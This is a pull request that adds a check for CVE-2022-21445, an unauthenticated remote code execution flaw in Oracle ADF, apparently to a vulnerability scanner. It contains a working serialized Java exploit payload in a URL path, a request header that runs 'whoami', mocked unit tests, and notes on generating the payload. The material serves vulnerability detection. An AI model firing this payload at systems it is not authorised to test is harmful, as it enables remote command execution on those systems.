### PR TITLE
Add CVE-2022-21445

### DIFF
--- a/agent/exploits/cve_2022_21445.py
+++ b/agent/exploits/cve_2022_21445.py
@@ -1,0 +1,134 @@
+"""Agent Asteroid implementation for CVE-2022-21445"""
+
+import logging
+import requests
+
+from requests import exceptions as requests_exceptions
+from urllib import parse as urlparse
+
+from agent.exploits import webexploit
+from agent import exploits_registry
+from agent import definitions
+
+VULNERABILITY_TITLE = (
+    "Oracle Application Development Framework (ADF) Remote Code Execution Vulnerability"
+)
+VULNERABILITY_REFERENCE = "CVE-2022-21445"
+VULNERABILITY_DESCRIPTION = """A critical remote code execution (RCE) vulnerability in Oracle Application Development 
+Framework (ADF) that can be exploited without authentication. This vulnerability affects ADF versions 12.2.1.3.0 and 
+12.2.1.4.0."""
+RISK_RATING = "CRITICAL"
+
+MAX_REDIRECTS = 2
+DEFAULT_TIMEOUT = 90
+
+EXPLOIT_PATH = (
+    "/em/afr/foo/remote/H4sIAAAAAAAAAA%3D%3DtVdbcBtXGf5WlrSb9ToX5eIotzalDXJi6%2BJbsB1KJdkiAeVCZNwkBsxqdWxv"
+    "-stqVd49sB2jacm8LpdxpaBugtOESmOFFZDqTTuCBYWCAGV6Y4QF4YIYO0z7BDDwwlP_oEkux3DgP"
+    "-SKOze_7_P__l_N_5_6NrbyDguRgwnGKU6_ac4zlW1LQ5c23dipa5KWaLzgUWPc2KDmdpx_a4Wza4"
+    "-4_7m8uuZ6T_9fckH3zSU4ozuJN05j2PrdPa8vqjHLFIXO5k_zww%2BloVWnCmwWdM2uenYHANZshhr"
+    "-WIw1LMaExVjNYixt6Z43fmvR2HKp7Da0R4X2aF37M789c2Wz12P5gOUS6EMRJe4c0W36H_j1q0_9-C3"
+    "%2B8XI1nA8WTrwpwmqay8BdnzAJHYr1%2BHyswm5v8Ys1rUnHtH93_DiqTf6k72Vn51X9feZV8HcSP-ZZxQcRAnVZzC"
+    "%2B2ScVuFHToWESQXvV6FhSsXDOCOGswrOyZgWxA%2Bo%2BCA%2BJGNGwYdl6AqOqNiEvIrd"
+    "-MBQUVDDMismcgnnxNFWcxwUZloKieLUVOApKKrZgQYULTwVHWbwtimFJDMuCe1HGR1S8HR%2BV8TEZ"
+    "-j0gIHhFb9qCEjkjPlAR_2ikwCZuyps1OlIt55k7qeYsooaxj6NaU7ppiXif62TIzJGxtAskp1zGY"
+    "-541JkPWCXqItlbA7u8TyljNnGrElx70Qe5iGZI1JcoFZk1kFCeEmLS6btQgNsYxgkUyHkz8vfFgF"
+    "-RmK5bEFCdMWEx9xFi_GVfOZqhNNsocw8fqxYsmrLPAmx9SzzSnRQWGOdUSy0epLjrmnPEcu_qLsJ-CdubeBPLBitVAU9sPm"
+    "%2BSyXPrQJ2lF_MFPZatPhrou38i0T%2BRTg6OZOLD4_HBeCI5Mj4YH071j6fT"
+    "-hweHB5JkoyvHdePCcb1UTVA1x5dkPEqgJGwRsAgxMh4jDEhQc07ZNVjGFIkcvEtTURGihM2350PD-ITwu4"
+    "%2BMaPoFPUuJb8z5BaClzNjnvMr2g4VP4tIbP4LMSthiObdNy2qijul2wmKvhCTxJnmt4Cp_T"
+    "-8Hk8TVJzjLfmkoC64kH1qGr4Ap6R8UUNX8KXJfTeDSoorc0WammX0HdXENHwFXxVw9fwdToBjhe1"
+    "-9SLl4RsanhXky_gmQWjJtDU8h%2BdlvKDhCr7VspE1OEnwxQwNcXyb3rx5Gvpo%2Bh28KOO7Gl5CL6VR-w8u4quF7"
+    "%2BL6GH6BXww_FcA29dCLbQFDDjwTrzP8LflK189xBdTJPLUc3eLUD1YpIeM3iIKF7jZJA"
+    "-YFhVciTsiLRpV6KqNW1vDXx0Uoyy61Jkjfm2SE_2dik6UBsJEemapHBMwl6Se6tqpogFAomUhBaV"
+    "-VSIJbCaBcWZYussK9Vj6IqvLSc9bVMMuj_GkIWI2a2U4ck5E2UGaJRyItNmDdoVzA4kfZ3zeIQ8e"
+    "-auPB9Crn2_lU00Dqdq7Fox5TS76EkTa%2BtUvZWu4epaQIWBy4w4bdKsmy6U0US_xitb2daz1nFz3O"
+    "-ihI6SS8hqMRcIdbJnayzxNy0Lo5%2BKyhuaVWoXHHdtCnHu5s9Sc_rbk7UE9tgY8JcE0hPl%2BkUFUmn"
+    "-SvZuTba3GKiTyUKkBcltIlxpsztWatbJMi%2BVOUkznQIbakbqWqWreUm9wyXuehFtm2Ex3U2VZ2dF"
+    "-esShOWY3udLdCNN0Yk0MMta55JqcNeR2RtqKCXAHZq2yqIMBw3JEajqr84bFTSXaIV5tfpNUXhj2-o4duYeIj0fcQemnsA3w"
+    "%2BBKAQ9Y2DHTcg_RS%2B6%2Bi4CX8FgeyhCoIhuQLleC_NN_TSXD3RJ4idJKtV"
+    "-0NUn1lSw8SY2jfqrnM2rOFtGA2F_KFTB1tFgOPgLXAoHK9h2GYuh7dexo4Lu0M4Kws9i_3XsCt7A-7rMdoVDurD"
+    "%2B0J3c2EA7mKtg7Kl_FvhXuPsG9p4kbDlRwbwX7q88wOXxfBW%2BrE%2B%2BvPx8QzwNXoYio-Ij%2Bh4BX8FX%2Bji18HohT"
+    "%2BFLbTGCSqghA2YA9U2rJO4mtIogvT2IgC3UAX6Mr4OElcwTa8gh34Obrx-O"
+    "%2BzEHxDGn7GLdO4jrXvwGvbiddyDGGmdJV3PkZ04EpBp1cH6Wwi_Rz8GyJc9%2BCVdlYfgI3s3MIzD"
+    "-JJ3Ei3gHRui2PE2tfxRjlKgCHsMRvJP8fI3oD%2BJdtJZSh4dIGkjRbwCBN8k5WUZaxriMCRkZGe%2BW"
+    "-cVTGMeA_2CXjPW8SFiSSoCUy3usnJVla6sNx%2BmsRW%2Bdfi0YXfCTzM37zn5ERHzqy6CzOeCkqFCeo"
+    "-x_N2d8IsVBI5RajU59gCLqGrRplirkcduUpZLnFsbG21HJH1NmmOewf7B1Lx_nR8KB5PHE71D46n"
+    "-EvHxTObw0EgyOTScyvwPvlNuShcOAAA%3D-/"
+)
+
+
+@exploits_registry.register
+class OracleADFExploit(webexploit.WebExploit):
+    accept_request = definitions.Request(method="GET", path="/")
+    check_request = definitions.Request(method="GET", path="/")
+    metadata = definitions.VulnerabilityMetadata(
+        title=VULNERABILITY_TITLE,
+        description=VULNERABILITY_DESCRIPTION,
+        reference=VULNERABILITY_REFERENCE,
+        risk_rating=RISK_RATING,
+    )
+
+    def accept(self, target: definitions.Target) -> bool:
+        """Override the accept method to check for X-ORACLE-DMS-ECID in the response headers."""
+
+        session = requests.Session()
+        session.max_redirects = MAX_REDIRECTS
+        session.verify = False
+
+        target_endpoint = urlparse.urljoin(target.origin, self.check_request.path)
+
+        try:
+            req = requests.Request(
+                method=self.check_request.method,
+                url=target_endpoint,
+                headers=self.check_request.headers,
+                data=self.check_request.data,
+            ).prepare()
+            resp = session.send(req, timeout=DEFAULT_TIMEOUT)
+        except requests_exceptions.RequestException as e:
+            logging.info("Request Exception Occurred: %s", e)
+            return False
+
+        if "X-ORACLE-DMS-ECID" in resp.headers:
+            logging.info("X-ORACLE-DMS-ECID header found in the response")
+            return True
+        return False
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """Rule to detect specific vulnerability on a specific target.
+
+        Args:
+            target: Target to scan
+
+        Returns:
+            List of identified vulnerabilities.
+        """
+        session = requests.Session()
+        session.max_redirects = MAX_REDIRECTS
+        session.verify = False
+
+        vulnerabilities: list[definitions.Vulnerability] = []
+
+        exploit_endpoint = urlparse.urljoin(target.origin, EXPLOIT_PATH)
+        try:
+            exploit_req = requests.Request(
+                method="GET",
+                url=exploit_endpoint,
+                headers={"cmd": "whoami"},
+            ).prepare()
+            exploit_resp = session.send(exploit_req, timeout=DEFAULT_TIMEOUT)
+
+            if exploit_resp.status_code == 200:
+                response_text = exploit_resp.text.lower()
+                if any(
+                    user in response_text for user in ["root", "nt authority\\system"]
+                ):
+                    logging.info("Potential RCE vulnerability detected")
+                    vulnerability = self._create_vulnerability(target)
+                    vulnerabilities.append(vulnerability)
+
+        except requests_exceptions.RequestException as e:
+            logging.info("Exploit check failed: %s", e)
+
+        return vulnerabilities

--- a/tests/exploits/cve_2022_21445_test.py
+++ b/tests/exploits/cve_2022_21445_test.py
@@ -1,0 +1,160 @@
+"""Unit tests for Agent Asteroid: CVE-2022-21445"""
+
+import requests_mock as req_mock
+import requests
+
+from agent import definitions
+from agent.exploits import cve_2022_21445
+
+EXPLOIT_PATH = (
+    "/em/afr/foo/remote/H4sIAAAAAAAAAA%3D%3DtVdbcBtXGf5WlrSb9ToX5eIotzalDXJi6%2BJbsB1KJdkiAeVCZNwkBsxqdWxv"
+    "-stqVd49sB2jacm8LpdxpaBugtOESmOFFZDqTTuCBYWCAGV6Y4QF4YIYO0z7BDDwwlP_oEkux3DgP"
+    "-SKOze_7_P__l_N_5_6NrbyDguRgwnGKU6_ac4zlW1LQ5c23dipa5KWaLzgUWPc2KDmdpx_a4Wza4"
+    "-4_7m8uuZ6T_9fckH3zSU4ozuJN05j2PrdPa8vqjHLFIXO5k_zww%2BloVWnCmwWdM2uenYHANZshhr"
+    "-WIw1LMaExVjNYixt6Z43fmvR2HKp7Da0R4X2aF37M789c2Wz12P5gOUS6EMRJe4c0W36H_j1q0_9-C3"
+    "%2B8XI1nA8WTrwpwmqay8BdnzAJHYr1%2BHyswm5v8Ys1rUnHtH93_DiqTf6k72Vn51X9feZV8HcSP-ZZxQcRAnVZzC"
+    "%2B2ScVuFHToWESQXvV6FhSsXDOCOGswrOyZgWxA%2Bo%2BCA%2BJGNGwYdl6AqOqNiEvIrd"
+    "-MBQUVDDMismcgnnxNFWcxwUZloKieLUVOApKKrZgQYULTwVHWbwtimFJDMuCe1HGR1S8HR%2BV8TEZ"
+    "-j0gIHhFb9qCEjkjPlAR_2ikwCZuyps1OlIt55k7qeYsooaxj6NaU7ppiXif62TIzJGxtAskp1zGY"
+    "-541JkPWCXqItlbA7u8TyljNnGrElx70Qe5iGZI1JcoFZk1kFCeEmLS6btQgNsYxgkUyHkz8vfFgF"
+    "-RmK5bEFCdMWEx9xFi_GVfOZqhNNsocw8fqxYsmrLPAmx9SzzSnRQWGOdUSy0epLjrmnPEcu_qLsJ-CdubeBPLBitVAU9sPm"
+    "%2BSyXPrQJ2lF_MFPZatPhrou38i0T%2BRTg6OZOLD4_HBeCI5Mj4YH071j6fT"
+    "-hweHB5JkoyvHdePCcb1UTVA1x5dkPEqgJGwRsAgxMh4jDEhQc07ZNVjGFIkcvEtTURGihM2350PD-ITwu4"
+    "%2BMaPoFPUuJb8z5BaClzNjnvMr2g4VP4tIbP4LMSthiObdNy2qijul2wmKvhCTxJnmt4Cp_T"
+    "-8Hk8TVJzjLfmkoC64kH1qGr4Ap6R8UUNX8KXJfTeDSoorc0WammX0HdXENHwFXxVw9fwdToBjhe1"
+    "-9SLl4RsanhXky_gmQWjJtDU8h%2BdlvKDhCr7VspE1OEnwxQwNcXyb3rx5Gvpo%2Bh28KOO7Gl5CL6VR-w8u4quF7"
+    "%2BL6GH6BXww_FcA29dCLbQFDDjwTrzP8LflK189xBdTJPLUc3eLUD1YpIeM3iIKF7jZJA"
+    "-YFhVciTsiLRpV6KqNW1vDXx0Uoyy61Jkjfm2SE_2dik6UBsJEemapHBMwl6Se6tqpogFAomUhBaV"
+    "-VSIJbCaBcWZYussK9Vj6IqvLSc9bVMMuj_GkIWI2a2U4ck5E2UGaJRyItNmDdoVzA4kfZ3zeIQ8e"
+    "-auPB9Crn2_lU00Dqdq7Fox5TS76EkTa%2BtUvZWu4epaQIWBy4w4bdKsmy6U0US_xitb2daz1nFz3O"
+    "-ihI6SS8hqMRcIdbJnayzxNy0Lo5%2BKyhuaVWoXHHdtCnHu5s9Sc_rbk7UE9tgY8JcE0hPl%2BkUFUmn"
+    "-SvZuTba3GKiTyUKkBcltIlxpsztWatbJMi%2BVOUkznQIbakbqWqWreUm9wyXuehFtm2Ex3U2VZ2dF"
+    "-esShOWY3udLdCNN0Yk0MMta55JqcNeR2RtqKCXAHZq2yqIMBw3JEajqr84bFTSXaIV5tfpNUXhj2-o4duYeIj0fcQemnsA3w"
+    "%2BBKAQ9Y2DHTcg_RS%2B6%2Bi4CX8FgeyhCoIhuQLleC_NN_TSXD3RJ4idJKtV"
+    "-0NUn1lSw8SY2jfqrnM2rOFtGA2F_KFTB1tFgOPgLXAoHK9h2GYuh7dexo4Lu0M4Kws9i_3XsCt7A-7rMdoVDurD"
+    "%2B0J3c2EA7mKtg7Kl_FvhXuPsG9p4kbDlRwbwX7q88wOXxfBW%2BrE%2B%2BvPx8QzwNXoYio-Ij%2Bh4BX8FX%2Bji18HohT"
+    "%2BFLbTGCSqghA2YA9U2rJO4mtIogvT2IgC3UAX6Mr4OElcwTa8gh34Obrx-O"
+    "%2BzEHxDGn7GLdO4jrXvwGvbiddyDGGmdJV3PkZ04EpBp1cH6Wwi_Rz8GyJc9%2BCVdlYfgI3s3MIzD"
+    "-JJ3Ei3gHRui2PE2tfxRjlKgCHsMRvJP8fI3oD%2BJdtJZSh4dIGkjRbwCBN8k5WUZaxriMCRkZGe%2BW"
+    "-cVTGMeA_2CXjPW8SFiSSoCUy3usnJVla6sNx%2BmsRW%2Bdfi0YXfCTzM37zn5ERHzqy6CzOeCkqFCeo"
+    "-x_N2d8IsVBI5RajU59gCLqGrRplirkcduUpZLnFsbG21HJH1NmmOewf7B1Lx_nR8KB5PHE71D46n"
+    "-EvHxTObw0EgyOTScyvwPvlNuShcOAAA%3D-/"
+)
+
+
+def test_OracleADFExploit_whenVulnerable_reportFinding(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2022-21445 unit test: case when target is vulnerable."""
+    requests_mock.get(
+        "http://localhost:7001/",
+        headers={"X-ORACLE-DMS-ECID": "some-value"},
+        status_code=200,
+    )
+    requests_mock.get(
+        f"http://localhost:7001{EXPLOIT_PATH}",
+        text="root",
+        status_code=200,
+    )
+
+    exploit_instance = cve_2022_21445.OracleADFExploit()
+    target = definitions.Target("http", "localhost", 7001)
+
+    accept = exploit_instance.accept(target)
+    vulnerabilities = exploit_instance.check(target)
+
+    assert accept is True
+    assert len(vulnerabilities) == 1
+    vulnerability = vulnerabilities[0]
+    assert (
+        vulnerability.entry.title
+        == "Oracle Application Development Framework (ADF) Remote Code Execution Vulnerability"
+    )
+    assert vulnerability.technical_detail == (
+        "http://localhost:7001 is vulnerable to CVE-2022-21445, Oracle Application Development Framework (ADF) Remote "
+        "Code Execution Vulnerability"
+    )
+
+
+def test_OracleADFExploit_whenNotVulnerable_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2022-21445 unit test: case when target is not vulnerable."""
+    requests_mock.get(
+        "http://localhost:7001/",
+        headers={"X-ORACLE-DMS-ECID": "some-value"},
+        status_code=200,
+    )
+    requests_mock.get(
+        f"http://localhost:7001{EXPLOIT_PATH}",
+        status_code=404,
+    )
+
+    exploit_instance = cve_2022_21445.OracleADFExploit()
+    target = definitions.Target("http", "localhost", 7001)
+
+    accept = exploit_instance.accept(target)
+    vulnerabilities = exploit_instance.check(target)
+
+    assert accept is True
+    assert len(vulnerabilities) == 0
+
+
+def testOracleADFExploit_whenRequestException_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2022-21445 unit test: case when a request exception occurs."""
+    requests_mock.get(
+        "http://localhost:7001/",
+        exc=requests.RequestException("Mocked network error"),
+    )
+
+    exploit_instance = cve_2022_21445.OracleADFExploit()
+    target = definitions.Target("http", "localhost", 7001)
+
+    accept = exploit_instance.accept(target)
+
+    assert accept is False
+
+
+def testOracleADFExploit_whenNoOracleHeader_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2022-21445 unit test: case when no Oracle header is found."""
+    requests_mock.get(
+        "http://localhost:7001/",
+        headers={"Server": "Apache/2.4.41 (Ubuntu)"},
+        status_code=200,
+    )
+
+    exploit_instance = cve_2022_21445.OracleADFExploit()
+    target = definitions.Target("http", "localhost", 7001)
+
+    accept = exploit_instance.accept(target)
+
+    assert accept is False
+
+
+def testOracleADFExploit_whenExploitFails_reportNothing(
+    requests_mock: req_mock.mocker.Mocker,
+) -> None:
+    """CVE-2022-21445 unit test: case when the exploit attempt fails."""
+    requests_mock.get(
+        "http://localhost:7001/",
+        headers={"X-ORACLE-DMS-ECID": "some-value"},
+        status_code=200,
+    )
+    requests_mock.get(
+        f"http://localhost:7001{EXPLOIT_PATH}",
+        text="Error 404--Not Found",
+        status_code=404,
+    )
+
+    exploit_instance = cve_2022_21445.OracleADFExploit()
+    target = definitions.Target("http", "localhost", 7001)
+
+    accept = exploit_instance.accept(target)
+    vulnerabilities = exploit_instance.check(target)
+
+    assert accept is True
+    assert len(vulnerabilities) == 0


### PR DESCRIPTION
## Implement Exploit for CVE-2022-21445: Oracle ADF Faces Deserialization Vulnerability

### Description
This PR implements an exploit for CVE-2022-21445, a critical remote code execution (RCE) vulnerability in Oracle Application Development Framework (ADF) that can be exploited without authentication. The vulnerability affects ADF versions 12.2.1.3.0 and 12.2.1.4.0.

The vulnerability is caused by a deserialization of untrusted data in the `org.apache.myfaces.trinidad.webapp.ResourceServlet` class. The exploit path involves:

### Implementation Details
The exploit is implemented in the `OracleADFExploit` class, which extends `WebExploit`. Key components include:

1. **Accept Method**: Checks for the presence of the `X-ORACLE-DMS-ECID` header in the response, indicating a potential Oracle ADF target.
2. **Check Method**: Attempts to exploit the vulnerability by sending a crafted request with a `whoami` command.
3. **Exploit Path**: Uses a specific URL pattern to trigger the vulnerability.

#### Payload Generation
The exploit endpoint is generated using a custom Java application. This process involves:

1. Creating a `LambdaIdentity` class that extends `AbstractRemotable` and contains the malicious code to be executed.
2. Using the `RemoteConstructor` class to create a serializable object that, when deserialized, will execute the malicious code.
3. Encoding the serialized object using `SerializationUtils.toURLEncodedString()` to create the final payload.

The payload generation code is provided in the `Main.java` file and requires the following dependencies:
- adf-richclient-api-11.jar
- coherence.jar
- com.bea.core.weblogic.web.api_1.4.0.0.jar
- wlfullclient.jar

PoC [link](https://github.com/M0chae1/CVE-2022-21445).
![image](https://github.com/user-attachments/assets/a9583ef7-4812-4845-9ad6-68cfe4e7d4e1)
